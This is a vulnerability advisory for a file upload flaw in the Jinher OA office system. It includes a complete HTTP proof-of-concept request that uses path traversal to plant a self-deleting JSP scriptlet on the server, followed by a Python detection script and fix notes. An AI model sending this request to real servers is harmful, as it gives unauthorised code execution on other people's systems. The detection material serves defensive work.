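Vulnerability Description
金和OA (Jinher OA) is an enterprise office automation system. The vulnerability is in the /jc6/ntkoUpload/ntko-upload!upload.action endpoint: by uploading a specially crafted file, an attacker can execute arbitrary code on the server, which may lead to disclosure of sensitive information, data tampering, and full compromise of the server.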
POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 600
Content-Type: multipart/form-data; boundary=195f850f295ca76329b90df79ba181a7bffe4d5f06996ad0075dc8b45955
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1334.101 Safari/537.36

--195f850f295ca76329b90df79ba181a7bffe4d5f06996ad0075dc8b45955
Content-Disposition: form-data; name="upLoadFile"; filename="hjxaf.jpg"
Content-Type: image/jpeg

<% out.print(111*222);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--195f850f295ca76329b90df79ba181a7bffe4d5f06996ad0075dc8b45955
Content-Disposition: form-data; name="Submit"

upload
--195f850f295ca76329b90df79ba181a7bffe4d5f06996ad0075dc8b45955
Content-Disposition: form-data; name="filename"

../../../../upload/hjxaf.jsp
--195f850f295ca76329b90df79ba181a7bffe4d5f06996ad0075dc8b45955--
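
A detection check for logged or proxied requests to this endpoint, added here as an example (not code from the original page or from the vendor). It assumes, as the request above suggests, that the "filename" form field decides where the upload is written; the function names, the extension list and the sample bodies are constructed for illustration.

```python
import re
from email import message_from_bytes

ENDPOINT = "/jc6/ntkoUpload/ntko-upload!upload.action"  # endpoint named on the page
EXEC_EXT = (".jsp", ".jspx")       # assumption: extensions the container executes
TRAVERSAL = re.compile(r"\.\.[\\/]")

def parse_fields(content_type, body):
    """Map each form field name to (declared filename or None, value text)."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = message_from_bytes(raw)
    if not msg.is_multipart():
        return {}
    fields = {}
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        fields[name] = (part.get_filename(), data.decode("utf-8", "replace").strip())
    return fields

def inspect_upload(path, content_type, body):
    """Return the reasons a logged request matches the pattern in the request above."""
    if path.split("?")[0] != ENDPOINT:
        return []
    fields = parse_fields(content_type, body)
    _, dest = fields.get("filename", (None, ""))
    _, content = fields.get("upLoadFile", (None, ""))
    reasons = []
    if TRAVERSAL.search(dest):
        reasons.append("path traversal in filename field")
    if dest.lower().endswith(EXEC_EXT):
        reasons.append("server-executable extension in filename field")
    if "<%" in content:
        reasons.append("JSP scriptlet marker in uploaded content")
    return reasons

# Constructed samples (not captured traffic); the scriptlet body is empty.
CT = "multipart/form-data; boundary=b0"
def _body(dest, content):
    return (f'--b0\r\nContent-Disposition: form-data; name="upLoadFile"; '
            f'filename="a.jpg"\r\nContent-Type: image/jpeg\r\n\r\n{content}\r\n'
            f'--b0\r\nContent-Disposition: form-data; name="filename"\r\n\r\n'
            f'{dest}\r\n--b0--\r\n').encode()
SUSPECT = _body("../../upload/a.jsp", "<% %>")
BENIGN = _body("report.jpg", "JFIF")

if __name__ == "__main__":
    print(inspect_upload(ENDPOINT, CT, SUSPECT))
    print(inspect_upload(ENDPOINT, CT, BENIGN))
```

The same three conditions are what a server-side fix has to reject before writing the file: a destination name containing a traversal sequence, a destination extension the container will execute, and content that does not match the declared image type.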